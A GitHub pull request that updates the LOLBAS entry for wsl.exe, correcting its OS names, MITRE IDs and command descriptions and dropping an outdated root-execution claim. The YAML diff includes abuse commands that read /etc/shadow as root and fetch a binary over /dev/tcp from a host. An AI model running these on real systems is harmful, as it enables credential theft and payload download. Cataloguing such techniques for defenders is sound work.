### PR TITLE
update wsl.exe description

### DIFF
--- a/yml/OtherMSBinaries/Wsl.yml
+++ b/yml/OtherMSBinaries/Wsl.yml
@@ -52,5 +52,4 @@ Acknowledgement:
     Handle: '@d1r4c'
   - Person: Nasreddine Bencherchali
     Handle: '@nas_bench'
-  - Person: Konrad Klawikowski
-    Handle: ''
+  - Person: Konrad 'unrooted' Klawikowski

--- a/yml/OtherMSBinaries/Wsl.yml
+++ b/yml/OtherMSBinaries/Wsl.yml
@@ -10,28 +10,28 @@ Commands:
     Category: Execute
     Privileges: User
     MitreID: T1202
-    OperatingSystem: Windows 10, Windows 19 Server, Windows 11
+    OperatingSystem: Windows 10, Windows Server 2019, Windows 11
   - Command: wsl.exe -u root -e cat /etc/shadow
     Description: Cats /etc/shadow file as root
     Usecase: Performs execution of arbitrary Linux commands as root without need for password.
     Category: Execute
     Privileges: User
     MitreID: T1202
-    OperatingSystem: Windows 10, Windows 19 Server, Windows 11
+    OperatingSystem: Windows 10, Windows Server 2019, Windows 11
   - Command: wsl.exe --exec bash -c "<command>"
-    Description: Executes Linux command (for example via bash) as the default user (unless stated otherwise using `-u <username>`) on the default WSL distro (unless  stated otherwise using `-d <distro name>`)
+    Description: Executes Linux command (for example via bash) as the default user (unless stated otherwise using `-u <username>`) on the default WSL distro (unless stated otherwise using `-d <distro name>`)
     Usecase: Performs execution of arbitrary Linux commands.
     Category: Execute
     Privileges: User
     MitreID: T1202
-    OperatingSystem: Windows 10, Windows 19 Server, Windows 11
+    OperatingSystem: Windows 10, Windows Server 2019, Windows 11
   - Command: wsl.exe --exec bash -c 'cat < /dev/tcp/192.168.1.10/54 > binary'
     Description: Downloads file from 192.168.1.10
     Usecase: Download file
     Category: Download
     Privileges: User
-    MitreID: T1202
-    OperatingSystem: Windows 10, Windows 19 Server, Windows 11
+    MitreID: T1105
+    OperatingSystem: Windows 10, Windows Server 2019, Windows 11
 Full_Path:
   - Path: C:\Windows\System32\wsl.exe
 Code_Sample:

--- a/yml/OtherMSBinaries/Wsl.yml
+++ b/yml/OtherMSBinaries/Wsl.yml
@@ -18,8 +18,8 @@ Commands:
     Privileges: User
     MitreID: T1202
     OperatingSystem: Windows 10, Windows 19 Server, Windows 11
-  - Command: wsl.exe --exec <command>
-    Description: Executes Linux command as the default user (unless stated otherwise using `-u <username>`) on the default WSL distro (unless  stated otherwise using `-d <distro name>`)
+  - Command: wsl.exe --exec bash -c "<command>"
+    Description: Executes Linux command (for example via bash) as the default user (unless stated otherwise using `-u <username>`) on the default WSL distro (unless  stated otherwise using `-d <distro name>`)
     Usecase: Performs execution of arbitrary Linux commands.
     Category: Execute
     Privileges: User

--- a/yml/OtherMSBinaries/Wsl.yml
+++ b/yml/OtherMSBinaries/Wsl.yml
@@ -10,35 +10,28 @@ Commands:
     Category: Execute
     Privileges: User
     MitreID: T1202
-    OperatingSystem: Windows 10, Windows 19 Server
+    OperatingSystem: Windows 10, Windows 19 Server, Windows 11
   - Command: wsl.exe -u root -e cat /etc/shadow
     Description: Cats /etc/shadow file as root
     Usecase: Performs execution of arbitrary Linux commands as root without need for password.
     Category: Execute
     Privileges: User
     MitreID: T1202
-    OperatingSystem: Windows 10, Windows 19 Server
-  - Command: wsl.exe --exec bash -c 'cat file'
-    Description: Cats /etc/shadow file as root
+    OperatingSystem: Windows 10, Windows 19 Server, Windows 11
+  - Command: wsl.exe --exec bash -c '<command>'
+    Description: Executes any command via bash, as long as the default user has enough permissions.
     Usecase: Performs execution of arbitrary Linux commands.
     Category: Execute
     Privileges: User
     MitreID: T1202
-    OperatingSystem: Windows 10, Windows 19 Server
-  - Command: wsl.exe --system calc.exe
-    Description: Execute the command as root
-    Usecase: Performs execution of arbitrary Linux commands as root without need for password.
-    Category: Execute
-    Privileges: User
-    MitreID: T1202
-    OperatingSystem: Windows 11
+    OperatingSystem: Windows 10, Windows 19 Server, Windows 11
   - Command: wsl.exe --exec bash -c 'cat < /dev/tcp/192.168.1.10/54 > binary'
     Description: Downloads file from 192.168.1.10
     Usecase: Download file
     Category: Download
     Privileges: User
     MitreID: T1202
-    OperatingSystem: Windows 10, Windows 19 Server
+    OperatingSystem: Windows 10, Windows 19 Server, Windows 11
 Full_Path:
   - Path: C:\Windows\System32\wsl.exe
 Code_Sample:
@@ -59,3 +52,5 @@ Acknowledgement:
     Handle: '@d1r4c'
   - Person: Nasreddine Bencherchali
     Handle: '@nas_bench'
+  - Person: Konrad Klawikowski
+    Handle: ''

--- a/yml/OtherMSBinaries/Wsl.yml
+++ b/yml/OtherMSBinaries/Wsl.yml
@@ -18,8 +18,8 @@ Commands:
     Privileges: User
     MitreID: T1202
     OperatingSystem: Windows 10, Windows 19 Server, Windows 11
-  - Command: wsl.exe --exec bash -c '<command>'
-    Description: Executes any command via bash, as long as the default user has enough permissions.
+  - Command: wsl.exe --exec <command>
+    Description: Executes Linux command as the default user (unless stated otherwise using `-u <username>`) on the default WSL distro (unless  stated otherwise using `-d <distro name>`)
     Usecase: Performs execution of arbitrary Linux commands.
     Category: Execute
     Privileges: User


### PR DESCRIPTION
hi, I've made some changes to the wsl.yml file as things seem to have changed in the WSL world (I was using the default 'just' Ubuntu with WSL2 on Windows 11)
![image](https://github.com/LOLBAS-Project/LOLBAS/assets/30440603/b0b2ce5d-512a-44dc-a90d-b79c3e7bedaa)

my changes: 

+ updated the 3rd section, which stated `Cats /etc/shadow file as root`, however, it showed `wsl.exe --exec bash -c 'cat file'` as an example command to do so, however, it would point to the default user on our default distro, rather than straight execute as root (quick verification of which user is actually being used below)

![image](https://github.com/LOLBAS-Project/LOLBAS/assets/30440603/9d171d37-dbf2-4952-9c81-65dae37b11be)

+ removed the 4th section, which stated that `--system` is all we need to execute commands as root, however, due to changes done recently to the WSL, it's not true anymore, as it would now use the default user in the 'system' WSL, which is `wslg`, to verify my statement and that the user `wslg` has not such perms, here's the proof, with a simple example of `ls /boot` (which, fun fact, is used only by the 'system' WSL distro)

![image](https://github.com/LOLBAS-Project/LOLBAS/assets/30440603/904e2163-d257-4d69-82d6-a84aa4741acf)


+ more minor and merely a cosmetic change, added `Windows 11` to all of those 

I hope my changes are OK. Please state if any changes should be made to my updated descriptions.